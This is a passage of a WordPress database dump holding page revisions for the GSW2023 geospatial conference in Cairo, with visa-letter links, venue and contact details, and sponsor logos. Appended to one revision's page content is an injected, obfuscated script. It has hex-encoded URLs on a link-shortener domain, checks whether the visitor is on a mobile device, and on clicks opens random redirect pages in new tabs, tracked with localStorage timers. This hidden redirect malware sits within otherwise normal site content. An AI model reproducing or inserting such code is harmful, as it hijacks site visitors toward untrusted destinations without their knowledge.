automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:58:39','2023-08-16 02:58:39','',3066,'https://gsw2023.com/?p=5277',0,'revision','',0),
(5278,1,'2023-08-16 02:58:57','2023-08-16 02:58:57','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154570478{margin-top: 75px !important;}\"]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>Prime Minister of the </strong></span><span style=\"font-size: 18pt;\"><strong>Arab Republic of Egypt</strong></span></h6>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px 